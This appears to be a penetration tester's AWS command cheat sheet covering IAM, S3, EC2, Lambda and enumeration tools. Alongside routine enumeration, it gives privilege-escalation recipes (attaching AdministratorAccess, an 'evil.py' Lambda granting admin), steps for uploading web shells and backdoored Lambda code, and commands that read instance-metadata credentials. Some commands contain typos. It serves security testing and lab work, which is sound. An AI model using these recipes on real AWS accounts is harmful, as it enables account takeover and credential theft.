AWS
00. Basic
Configure AWS creds
## ------------------| Configure
aws configure
# AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
# AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# Default region name [None]: us-west-2
# Default output format [None]:
## ------------------| Export as env
export AWS_PROFILE=ProfileName
export AWS_REGION=<AWS_REGION>
export AWS_ACCESS_KEY_ID=<ACCESS_KEY>
export AWS_SECRET_ACCESS_KEY=<SECRET_KEY>
export AWS_SESSION_TOKEN=<SESSION_TOKEN>
## ------------------| Use as file
aws configure import --csv file://credentials.csv
## ------------------| Set as .aws
### ~/.aws/credentials
[<ProfileName>]
aws_access_key_id = <ACCESS_KEY>
aws_secret_access_key = <SECRET_KEY>
aws_session_token = <SESSION_TOKEN>
### ~/.aws/config
[profile <ProfileName>]
region = <AWS_REGION>
## ------------------| List details
aws sts get-caller-identity
Credentials
## ------------------| If the AccessKeyId starts with
AKI <-- long-term credentials
ASI <-- short-term (temporary) credentials
## ------------------| Format
arn:partition:service:region:account-id:resource-id
arn:partition:service:region:account-id:resource-type/resource-id
arn:partition:service:region:account-id:resource-type:resource-id
^ account-id is a 12-digit number
## ------------------| [partition]
aws AWS Regions
aws-cn China Regions
aws-us-gov AWS GovCloud (US) Regions
## ------------------| [service]
s3,lambda,ec2,iam
## ------------------| [region]
us-east-1,..
## if the region field is empty, the resource is global
arn:partition:service::account-id:resource-id
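## ------------------| List down all RDS databases
## JMESPath keys are case-sensitive: the RDS output uses DBInstanceIdentifier and
## DBSubnetGroup.VpcId; "DBinstanceIdentifier" / "VpcID" silently return null columns.
## The query is single-quoted so the shell does not glob-expand the brackets.
aws rds describe-db-instances --output=table --color on --filter --query 'DBInstances[].[DBInstanceIdentifier,MasterUsername,DBSubnetGroup.VpcId,Endpoint.Address]'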
## ------------------| List down all subnets
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier
## ------------------| Examine selected database subnets
aws rds describe-db-instances --output=table --color on --filter "Name=db-instance-id,Values=<DBName>" --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier
## ------------------| List down all NACLs
aws ec2 describe-network-acls --output=table --color on --filter --query NetworkAcls[].Entries
## |0.0.0.0/0| True | -1 | allow | 100 | << rule open to all traffic
## ------------------| For selected subnets; What traffic do network access control lists (NACLs) allow?
aws ec2 describe-network-acls --output=table --color on --filter "Name=association.subnet-id,Values=subnet-0a7f04b97a6ed9b11" --query NetworkAcls[].Entries
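## ------------------| What traffic do DB security groups allow?
aws ec2 describe-security-groups --output=table --color on
## describe-security-groups filters on "group-id" (there is no "groupid" filter name)
aws ec2 describe-security-groups --output=table --color on --filter "Name=group-id,Values=sg-0a7f04b97a6ed9b11" | less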
## ------------------| Find VPC with access to database
aws ec2 describe-vpcs --output=table --color on
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16"
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16" --query Vpcs[].VpcId
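## ------------------| VPC security group [inbound port 3306 / open egress + inbound port 22]
aws ec2 describe-security-groups --output=table --color on --filter "Name=ip-permission.to-port,Values=3306"
## Repeating --filter keeps only the last occurrence, so the egress filter was dropped;
## pass both filters as values of a single --filter so they are ANDed.
aws ec2 describe-security-groups --output=table --color on --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" "Name=ip-permission.to-port,Values=22" --query 'SecurityGroups[].GroupId'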
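## ------------------| Check Lambda functions
aws lambda list-functions --output=table --color on
## Single-quote the JMESPath query: unquoted backticks are run by the shell as a
## command substitution, and "?"/"[" are subject to globbing.
aws lambda list-functions --output=table --color on --query 'Functions[?VpcConfig.SecurityGroupIds==[`sg-07d51f986796059f9`]].FunctionName'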
## ------------------| Query to download Lambda source code
aws lambda get-function --function-name <FunctionName> --query Code.Location
## ------------------| List all EC2 instances that have a public IP (look for instances that could exfiltrate)
aws ec2 describe-instances --output text --query Reservations[].Instances[].NetworkInterfaces[].Association.[PublicIp,PublicDnsName]
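## ------------------| Find security groups with no outbound restrictions
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --query 'SecurityGroups[].GroupId'
## Both filters go to one --filter; a second --filter option replaces the first instead of adding to it.
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" "Name=vpc-id,Values=<VPCId>" --query 'SecurityGroups[].GroupId'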
01. IAM (Identity and Access Management)
01.0 Users
## ------------------| List all users
aws iam list-users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]
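## ------------------| Enumerate groups for users
aws iam list-groups-for-user --user-name <UserName>
## Quote the expansion so each user name is passed as a single argument.
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do aws iam list-groups-for-user --user-name "$i"; done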
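## ------------------| List all inline policies (per user)
## --user-name takes a user name; the group variant is list-group-policies --group-name
aws iam list-user-policies --user-name <UserName>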
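## ------------------| List all managed policies attached to a user
## --user-name takes a user name; the group variant is list-attached-group-policies --group-name
aws iam list-attached-user-policies --user-name <UserName>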
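## ------------------| Enumerate user's signing certificates
aws iam list-signing-certificates --user-name <UserName>
## printf instead of echo, and "$i" quoted, so odd user names cannot alter the output or the command line.
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do printf '[%s]\n' "$i"; aws iam list-signing-certificates --user-name "$i" --output json; done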
## ------------------| Check for public ssh keys for user.
aws iam get-ssh-public-key --user-name <UserName> --encoding <PEM/SSH> --ssh-public-key-id <SSHPublicKeyId>
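## ------------------| Check for Multi-Factor Auth for user
aws iam list-virtual-mfa-devices
aws iam list-mfa-devices --user-name <UserName>
## Loop over every user; "$i" is quoted so each name is one argument.
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do printf '[%s]\n' "$i"; aws iam list-mfa-devices --user-name "$i" --output json; done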
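## ------------------| Check if the user has a console login profile
aws iam get-login-profile --user-name <UserName>
## Users without a login profile return a NoSuchEntity error on stderr; the loop continues past them.
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do printf '[%s]\n' "$i"; aws iam get-login-profile --user-name "$i"; done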
## ------------------| Create another access key
aws iam create-access-key --user-name <UserName>
01.2 Groups
## ------------------| List all groups
aws iam list-groups --output json
## ------------------| List all inline policies
aws iam list-group-policies --group-name <GroupName>
## ------------------| Lists all managed policies
aws iam list-attached-group-policies --group-name <GroupName>
01.3 Roles
## ------------------| List all roles
aws iam list-roles --output json
## ------------------| List role information
aws iam get-role --role-name <RoleName> --output json
## ------------------| Lists all attached policies
## arn:aws:sts::<account-id>:.../<RoleName>/...
aws iam list-attached-role-policies --role-name <RoleName>
## ------------------| List all inline policies.
aws iam list-role-policies --role-name <RoleName>
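## ------------------| Assuming the role
## Role ARN format is arn:partition:service:region:account-id:resource-type/resource-id,
## i.e. a colon is required between the account id and "role/".
aws sts assume-role --role-arn arn:aws:iam::<AccountID>:role/<RoleName> --role-session-name AnyName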
01.4 Policies
## ------------------| List all policies
aws iam list-policies --output json
aws iam list-policies --output json --scope Local
aws iam list-policies --output json | grep Admin
aws iam list-policies --output json --query Policies[].[PolicyName,PolicyId,Arn,DefaultVersionId]
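## ------------------| List all inline policies
aws iam list-user-policies --user-name <UserName>
## Quote "$i" so each user name is passed as a single argument.
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do aws iam list-user-policies --user-name "$i"; done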
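## ------------------| List all managed policies
aws iam list-attached-user-policies --user-name <Username>
## The loop must query "$i", not a hard-coded user (the original repeated one user for every
## iteration). printf is used because bash's echo -n does not interpret "\t".
for i in $(aws iam list-users --query 'Users[].UserName' --output text); do printf '[%s]\t' "$i"; aws iam list-attached-user-policies --user-name "$i" --output text | awk '{print $2"\t"$3}'; done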
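## ------------------| Check policy permissions / Find the DefaultVersionId
## The ARN is passed as-is; only the two placeholders are substituted.
aws iam get-policy --policy-arn arn:aws:iam::<AccountID>:policy/<PolicyName>
## ------------------| Read the policy document
aws iam get-policy-version --output json --policy-arn arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>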
## ------------------| List details about inline policy document
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
aws iam get-group-policy --group-name <GroupName> --policy-name <PolicyName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>
## ------------------| [If user has PutUserPolicy] Add an inline policy document that is embedded in the specified IAM user
aws iam put-user-policy --user-name <UserName> --policy-name <PolicyName> --policy-document file://Policy.json
## ------------------| Policy.json
{
"Version": "2022-07-14",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}
01.5 Privilege Escalation
Required Permission | Privilege Escalation Method |
---|---|
iam:AttachUserPolicy | Attaching a policy to a user |
iam:AttachGroupPolicy | Attaching a policy to a group |
iam:AttachRolePolicy | Attaching a policy to a role |
iam:CreateAccessKey | Creating a new user access key |
iam:CreateLoginProfile | Creating a new login profile |
iam:UpdateLoginProfile | Updating an existing login profile |
iam:PassRole ec2:RunInstances | Creating an EC2 instance with an existing instance profile |
iam:PutUserPolicy | Creating/updating an inline policy for a user |
iam:PutGroupPolicy | Creating/updating an inline policy for a group |
iam:PutRolePolicy | Creating/updating an inline policy for a role |
iam:AddUserToGroup | Adding a user to a group |
iam:UpdateAssumeRolePolicy sts:AssumeRole | Updating the AssumeRolePolicyDocument of a role |
iam:PassRole lambda:CreateFunction lambda:InvokeFunction | Passing a role to a new Lambda function, then invoking it |
lambda:UpdateFunctionCode | Updating the code of an existing Lambda function |
01.5.1 Overly Permissive Permissions
iam:AttachUserPolicy
## ------------------| Check if you have "Action": "iam:AttachUserPolicy"
aws iam get-policy-version --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>
## ------------------| Find ARN for AdministratorAccess policy
aws iam list-policies | grep "AdministratorAccess"
## ------------------| Attach policy for a user
aws iam attach-user-policy --user-name <UserName> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
## ------------------| Checking attached policies again
aws iam list-attached-user-policies --user-name <UserName>
iam:CreateLoginProfile
## ------------------| Check if you have "Action": "iam:CreateLoginProfile"
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
## ------------------| List all users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]
## ------------------| View existing policies
aws iam list-attached-user-policies --user-name <UserName>
## ------------------| Creating login profile
aws iam create-login-profile --user-name <UserName> --password Passw0rd@123 --no-password-reset-required
sts:AssumeRole
## ------------------| Check if you have sts:AssumeRole
aws sts assume-role --role-arn <RoleArn> --role-session-name <SessionName> --profile <ProfileName>
### extract the token into ~/.aws
## ------------------| List all ebs snapshots
aws ec2 describe-snapshots --owner-ids <Victim_Account> --region <Region> --profile <ProfileName>
## ------------------| Exploit
aws ec2 modify-snapshot-attribute --snapshot-id <SnapId> --attribute CreateVoulmePermission --operation-type add --user-ids <Victim_Account> --region <Region> --profile <ProfileName>
aws ec2 create-volume --snapshot-id <SnapId> --availability-zone <Region> --region <Region> --profile <ProfileName>
aws ec2 attach-voumne --device /dev/xvhd --instance-id <InstanceID> --volume-id <VolumeId> --region <Region> --profile <ProfileName>
iam:PassRole with lambda:CreateFunction
## ------------------| Check if we have rights to go ahead
aws iam list-user-policies --user-name <CurrentUserName>
aws iam get-user-policy --user-name <CurrentUserName> --policy-name <PolicyName>
## ------------------| Finding lambda role details
aws iam list-roles --output json
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "lambda.amazonaws.com"
## ------------------| Check policy details for lambda role for iam:AttachUserPolicy
aws iam get-role --role-name <RoleName> --output json
aws iam list-role-policies --role-name <RoleName> --output json
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName> --output json
## ------------------| Creating lambda function (evil.py)
import boto3
def h4rithd(event, context):
iam = boto3.client("iam")
response = iam.attach_user_policy(
UserName="<UserName>",PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
## ------------------| Upload lambda function
zip evil-function.zip evil.py
aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.h4rithd --role <arn:aws:iam::account-id:/role/lamdaFunction
## ------------------| Execute/Invoking the lambda function
aws lambda invoke --function-name evil-function results.txt
iam:PassRole with ec2:RunInstances
## ------------------| List policies and check if we have access
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
## ------------------| List ec2 roles and get role name
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "ec2.amazonaws.com"
## ------------------| Listing policy details attached to role
aws iam list-role-policies --role-name <RoleName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>
## ------------------| Find AMI id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
## ------------------| Find subnet id
aws ec2 describe-subnets
## ------------------| List security groups
aws ec2 describe-security-groups
## ------------------| List instance profile name
aws iam list-instance-profiles
## ------------------| Start ec2 instance
aws ec2 run-instance --subnet-id <SubnetID> --image-id <AIMID> --iam-instance-profile Name=<ProfileName> --instance-type t2.micro --security-group-ids "<SecurityGroupId>"
## ------------------| If you have SSM *
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials"]' --targets "Key=instanceids,Values=<InstaneID>" --comment "This is comment"
## Copy the CommandID
## ------------------| Check the command's output
aws ssm get-command-invocation --command-id "<CommandID>" --instance-id "<InstanceID>"
01.5.2 Dangerous policy combinations
## ------------------| List policies
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
02. S3 (Simple Storage Service)
## ------------------| List all s3 buckets
aws s3api list-buckets
aws s3 ls s3://
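## ------------------| Interact with s3 buckets
aws s3 ls s3://<bucket-name>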
## ------------------| Get the information about specified bucket acls
aws s3api get-bucket-acl --bucket <BucketName>
## ------------------| Get the information about specified bucket policy
aws s3api get-bucket-policy --bucket <BucketName>
## ------------------| Retrieves the Public Access Block configuration for an Amazon S3 bucket
aws s3api get-public-access-block --bucket <BucketName>
## ------------------| List of all the objects in specified bucket
aws s3api list-objects --bucket <BucketName>
## ------------------| Get the acls information about specified object
aws s3api get-object-acl --bucket <BucketName> --key <ObjectName>
## ------------------| Copy file to bucket
aws s3 cp /tmp/shell.php s3://<bucktes-name>/shell.php
## ------------------| List all directories
aws --endpoint-url http://s3.bucket.htb s3 ls
## ------------------| List what is inside the directory
aws --endpoint-url http://s3.bucket.htb s3 ls
aws --endpoint-url http://s3.bucket.htb s3 ls <directory>
## ------------------| Upload file/shell
aws --endpoint-url http://s3.bucket.htb s3 cp shell.php s3://<directory>/shell.php
## ------------------| Create a bucket and enable versioning
aws s3 mb s3://aws-<BucketName> --region <Region> --profile <Profile>
aws s3api put-bucket-versioning --bucket <BucketName> --versioning-configuration Status=Enabled --region <Region> --profile <Profile>
03. VPC (Virtual Private Cloud)
## ------------------| Get details
aws ec2 describe-vpcs
aws ec2 describe-vpcs --region <us-east-1/us-west-1>
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=<VpcID>"
## ------------------| List Subnets
aws ec2 describe-subnets
aws ec2 describe-subnets --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List Route Table
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List Network ACLs
aws ec2 describe-network-acls
aws ec2 describe-network-acls --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List all VPC Peering Connections
aws ec2 describe-vpc-peering-connections
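## ------------------| List EC2 instances in the specified VPC
## Use straight double quotes: the typographic “ ” quotes are not shell quotes, so the
## filter would be split into two arguments.
aws ec2 describe-instances --filters "Name=vpc-id,Values=<VpcID>"
## ------------------| List EC2 instances in the specified Subnet
aws ec2 describe-instances --filters "Name=subnet-id,Values=<SubnetID>"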
04. EC2 (Elastic Compute Cloud)
## ------------------| List all Instances
aws ec2 describe-instances
aws ec2 describe-instances --region <us-east-1/us-west-1>
## ------------------| List the Information about Specified Instance
aws ec2 describe-instances --instance-ids <InstanceId>
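## ------------------| List the Information about UserData Attribute of the specified Instance
## "--attribute" must be two ASCII hyphens; an en dash is passed through as an unknown argument.
aws ec2 describe-instance-attribute --attribute userData --instance-id <InstanceId>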
## ------------------| List the Information about IAM instance profile associations
aws ec2 describe-iam-instance-profile-associations
## ------------------| Attach an instance profile with a role to a EC2 instance
aws ec2 associate-iam-instance-profile --instance-id <InstanceID> --iam-instance-profile Name=<ProfileName>
## ------------------| AWS Metadata
### IMDSv1
curl http://169.254.169.254/latest/meta-data/
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/Role
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName\
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
### IMDSv2
export TOKEN=$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
## ------------------| AWS Userdata
### IMDSv1
curl http://169.254.169.254/latest/user-data/
### IMDSv2
export TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/
05. EBS (Elastic Block Store)
## ------------------| List the Information about EBS volumes
aws ec2 describe-volumes
## ------------------| List about all the available EBS snapshots
aws ec2 describe-snapshots
aws ec2 describe-snapshots --owner-ids self
## ------------------| Creates a snapshot of the specified volume
aws ec2 create-snapshot --volume-id <VolumeID> --description "Backup Snapshot"
## ------------------| Create a volume from snapshots
aws ec2 create-volume --snapshot-id <SnapshotID> --availability-zone <AvailabilityZone>
## ------------------| Attach specified volume to the ec2-instance
aws ec2 attach-volume --volume-id <VolumeID> --instance-id <InstanceID> --device </dev/sdfd>
## ------------------| Mount Volume on EC2 file system
sudo mount </dev/sdfd> /mnt/backups
06. EKS (Elastic Kubernetes Service)
## ------------------| Describe about all the repositories in the container registry
aws ecr describe-repositories
## ------------------| Get the information about repository policy
aws ecr get-repository-policy --repository-name <RepositoryName>
## ------------------| Lists of all images in the specified repository
aws ecr list-images --repository-name <RepositoryName>
## ------------------| Describe the information about a container image
aws ecr describe-images --repository-name <RepositoryName>--image-ids imageTag=ImageTag
## ------------------| Lists all ECS Clusters
aws ecs list-clusters
## ------------------| Describe information about specified cluster
aws ecs describe-clusters --cluster <ClusterName>
## ------------------| Lists all services in the specified cluster
aws ecs list-services --cluster <ClusterName>
## ------------------| Describe the information about a specified service
aws ecs describe-services --cluster <ClusterName> --services <ServiceName>
## ------------------| Lists all tasks in the specified cluster
aws ecs list-tasks --cluster <ClusterName>
## ------------------| Describe the information about a specified task
aws ecs describe-tasks --cluster <ClusterName> --tasks <TaskArn>
## ------------------| Lists all containers in the specified cluster
aws ecs list-container-instances --cluster <ClusterName>
## ------------------| Lists all EKS Clusters
aws eks list-clusters
## ------------------| Describe the information about a specified cluster
aws eks describe-cluster --name <ClusterName>
## ------------------| List of all node groups in a specified cluster
aws eks list-nodegroups --cluster-name <ClusterName>
## ------------------| Describe the information about a specific node group in a cluster
aws eks describe-nodegroup --cluster-name <ClusterName> --nodegroup-name <NodeGroup>
## ------------------| List of all fargate in a specified cluster
aws eks list-fargate-profiles --cluster-name <ClusterName>
## ------------------| Describe the information about a specific fargate profile in a cluster
aws eks describe-fargate-profile --cluster-name <ClusterName> --fargate-profile-name <ProfileName>
07. RDS (Relational Database Service)
## ------------------| Describes the Information about the clusters in RDS
aws rds describe-db-clusters
## ------------------| Describes the Information about the database instances in RDS
aws rds describe-db-instances
## ------------------| Describes the Information about the subnet groups in RDS
aws rds describe-db-subnet-groups
## ------------------| Describes the Information about the database security groups in RDS
aws rds describe-db-security-groups
## ------------------| Describes the Information about the database proxies in RDS
aws rds describe-db-proxies
08. KMS (Key Management Service)
## ------------------| List all keys available in Key Management Service (KMS)
aws kms list-keys
## ------------------| Describe the specified key
aws kms describe-key --key-id <KeyID>
## ------------------| List the policies attached to the specified key
aws kms list-key-policies --key-id <KeyID>
## ------------------| Get full information about a policy
aws kms get-key-policy --policy-name <PolicyName> --key-id <KeyID>
09. Lambda
Functions
## ------------------| List all functions
aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb
## ------------------| Get code
aws lambda get-function --function-name=<Function_Name> --endpoint-url=http://cloud.epsilon.htb
## ------------------| Upload the backdoor updated code to aws lambda function
aws lambda update-function-code --function-name <MyFunction> --zip-file file://backdoor.zip
## ------------------| Get details for lambda function
aws lambda get-function --function-name <FunctionName>
## ------------------| Get details for the policy Information about the specified lambda function
aws lambda get-policy --function-name <FunctionName>
## ------------------| Get details for the event source mapping Information about the specified lambda function
aws lambda list-event-source-mappings --function-name <FunctionName>
## ------------------| List of all the layers (dependencies) in aws account
aws lambda list-layers
## ------------------| Get details for the full Information about the specified layer name
aws lambda get-layer-version --layer-name <LayerName> --version-number <VersionNumber>
## ------------------| Create a lambda function and attach role to this function
aws lambda create-function --function-name <MyFunction> --runtime <python3.7> --zip-file fileb://file.zip --handler <myfunction.handler> --role <RoleArn> --region <Region>
## ------------------| Invoke the lambda function
aws lambda invoke --function-name <FunctionName> response.json --region <Region>
API Gateway
## ------------------| List of all the Rest APIs
aws apigateway get-rest-apis
## ------------------| Get the information about specified API
aws apigateway get-rest-api --rest-api-id <ApiId>
## ------------------| Lists information about a collection of resources
aws apigateway get-resources --rest-api-id <ApiId>
## ------------------| Get information about the specified resource
aws apigateway get-resource --rest-api-id <ApiId> --resource-id <ResourceID>
## ------------------| Get the method information for the specified resource
aws apigateway get-method --rest-api-id <ApiId> --resource-id <ResourceID> --http-method <Method>
## ------------------| List of all stages for a REST API
aws apigateway get-stages --rest-api-id <ApiId>
## ------------------| Get the information about specified API's stage
aws apigateway get-stage --rest-api-id <ApiId> --stage-name <StageName>
## ------------------| List of all the API keys
aws apigateway get-api-keys --include-values
## ------------------| Get the information about a specified API key
aws apigateway get-api-key --api-key <ApiKey>
10. DynamoDB
## ------------------| List Tables
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
## ------------------| Get stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name <tableName> | jq .
## ------------------| Put stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name <tableName> --item file://<filename>.json
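## ------------------| Create table
## The stray "255 ⨯" was a pasted shell-prompt exit status that broke the line continuation.
aws --endpoint-url http://s3.bucket.htb dynamodb create-table \
  --table-name alerts \
  --attribute-definitions AttributeName=title,AttributeType=S \
  --key-schema AttributeName=title,KeyType=HASH \
  --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5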
11. Secrets Manager
## ------------------| List all secrets stored by Secrets Manager
aws secretsmanager list-secrets
## ------------------| Describe the specified secret
aws secretsmanager describe-secret --secret-id <SecretName>
## ------------------| Get the resource-based policy that is attached to the specified Secret
aws secretsmanager get-resource-policy --secret-id <SecretID>
12. pacu
Cross Account Enumerations
## ------------------| User Enumerations
### Create assume-role.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
### Create the role
aws iam create-role -role-name AnyName --assume-role-policy-document file:///$(pwd)/assume-role.json
### Start pacu and set the keys
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>
run iam__enum_users --role-name AnyName --account-id <StolenAccountID> --word-list username.txt
## ------------------| Role Enumerations
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID> --word-list username.txt
13. ScoutSuite
## ------------------| Install
git clone https://github.com/nccgroup/ScoutSuite && cd ScoutSuite
virtualenv -p python3 venv && source venv/bin/activate
pip install -r requirements.txt
python scout.py --help
## ------------------| Enumerate
python scout.py aws -p <Profile> -r <Region>
14. PMapper
## ------------------| Install
pip install principalmapper
## ------------------| Create a graph for the account, accessed through AWS CLI profile "skywalker"
pmapper --profile skywalker graph create
## ------------------| Run a query to see who can make IAM Users
pmapper --profile skywalker query 'who can do iam:CreateUser'
## ------------------| Run a query to see who can launch a big expensive EC2 instance, aside from "admin" users
pmapper --account 000000000000 argquery -s --action 'ec2:RunInstances' --condition 'ec2:InstanceType=c6gd.16xlarge'
## ------------------| Run the privilege escalation preset query, skip reporting current "admin" users
pmapper --account 000000000000 query -s 'preset privesc *'
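## ------------------| Create an SVG representation of the admins/privescs/inter-principal access
## --filetype needs a value; svg matches the heading (png, dot and graphml are the other choices).
pmapper --account 000000000000 visualize --filetype svg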